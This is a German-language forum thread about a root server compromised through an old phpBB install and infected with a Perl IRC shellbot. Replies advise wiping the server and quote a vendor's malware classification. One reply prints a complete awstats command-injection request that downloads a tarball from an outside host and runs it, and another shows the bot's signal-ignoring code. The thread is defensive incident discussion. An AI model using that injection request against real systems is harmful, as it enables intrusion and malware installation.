Hallo,

da heute morgen der Apache meines Rootservers nicht mehr gestartet war, habe ich mir die Log-Datei mal etwas näher angesehen. Durch eine Sicherheitslücke in einem alten phpBB (welches ich danach sofort gelöscht habe) hatte ein Angreifer per wget eine Datei nach /tmp/ heruntergeladen und mit perl ausgeführt.

Leider kann ich kein Perl, deshalb habe ich die Datei mal angehängt. Könnte mir hier vielleicht jemand sagen, ob, und wenn ja, welchen Schaden der Angreifer mit dieser Datei angerichtet hat?

Vielen Dank!

Ich kenn mich ja auch nicht mit Perl aus, aber das schaut mir ganz danach aus, dass das lustige Skript sich mit einem IRC-Server verbindet und dann von da jeder Shell-Zugang auf deinen Rechner hat.

Du solltest den Rechner schleunigst vom Netz nehmen, falls Du das noch nicht getan hast.

Aber dafür, dass das Script weiter ausgeführt werden kann, muss doch ein Perl-Prozess laufen. Das ist nicht der Fall (habe den Server nach Überprüfung der Initscripte neugestartet), also dürfte doch auch keine Möglichkeit des Zugriffs mehr bestehen.
In welchen Log-Dateien könnte ich denn nachsehen, ob und welche Befehle durch das Script auf dem Server ausgeführt wurden?

Und noch 'ne Frage: Da das Script ja über ein fehlerhaftes PHP-Script ausgeführt wurde, und PHP ja über Apache läuft, müsste es doch als User www-data laufen und dürfte eigentlich ja nicht allzuviel Schaden anrichten. Mein Traffic ist auch nicht merklich gestiegen...

Ich glaube du unterschätzt das, was da jemand anrichten kann. Nachdem ein Prozess eine Verbindung ins IRC aufgebaut hat, kann jeder der dort war weiter lustige Sachen mit dem Server machen - Daten runterladen, Daten manipulieren etc.. insbesondere Rootkits installieren, die die weitere Anwesenheit verbergen.. und damit ist es egal, ob du etwas sieht oder nicht. Ein Server der geknackt wurde MUSS platt gemacht und neu aufgesetzt werden. Weil nie weiss,t ob nicht doch noch jemand einen verborgenen Zugang zum System hat...

wer immer da in deinem system war kann weitere lücken gefunden haben, oder rootkits installiert haben. Du solltest den Server auf jeden Fall neu aufsetzen !!!!!

mfg martin

die ausführung des scripts kannst du nicht nachvollziehen, werd aber am abend mal nen blick drauf werfen

Hi,

nur mal eine Frage, welche phpBB-Version war das denn? Ist das Sicherheitsloch mittlerweile behoben, oder muss man irgendwas beachten?

Vorsicht auch bei awstats:



GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;mkdir%20.a; cd%20.a;wget%20http://fbi.php5.sk/qmail.tgz;tar%20-xzvf%20qmail.tgz; cd%20qmail;./start;echo%20;echo| HTTP/1.1


Dieser ShellBot wird auch über diesen Exploit verteilt

hab mir gerade den sourcecode überblicksmäßig angesehen!! *AUTSCH*

so wie das aussieht lauft der mit dem namen /usr/sbin/httpd -> namen der childs

beenden wirst du den auch net so schnelll

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';


nimm deinen server am besten sofort vom NETZ !!!!!!!

Für mich sieht das so aus als wird jemand deinen server als relay für weitere angriffe verwenden wollen

ich könnte mir noch gut vorstellen dass sich das script noch woanders hinkopiert hat. zum starten könnte es sich einfach in eine /etc/init.d/* eingetragen haben . hier muss man nur hinten ein /pfad/zur/datei/ayan anhängen und schon hast nen 2ten /usr/sbin/http am laufen, ohne dass du was merkst.

wie gesagt gutes altes "format c:/u" :p

habe das ganze mal an h+bedv gepostet und habe diese hübsche antwort erhalten:


Sehr geehrter Herr Baumgartner,


wir bedanken uns für Ihre Email.
In der von Ihnen eingesendeten Datei haben wir einen neuen Virus entdeckt. Dessen Signatur wird nun eingebaut, sodass er mit einem der nächsten Updates als Perl.Shellbot.a erkannt wird.

Wir bedanken uns für Ihre Mithilfe zur Verbesserung des Virenschutzes.
--

Freundliche Gruesse / Best regards
H+BEDV Datentechnik GmbH

i. A. Andreas Pohl
First Level Support

Anschrift: Lindauer Str. 21, D-88069 Tettnang, Germany
Tel. (Zentrale): +49 (0) 75 42 - 50 00

wenn du antivir verwendest kannst du ihn demnächst bekämpfen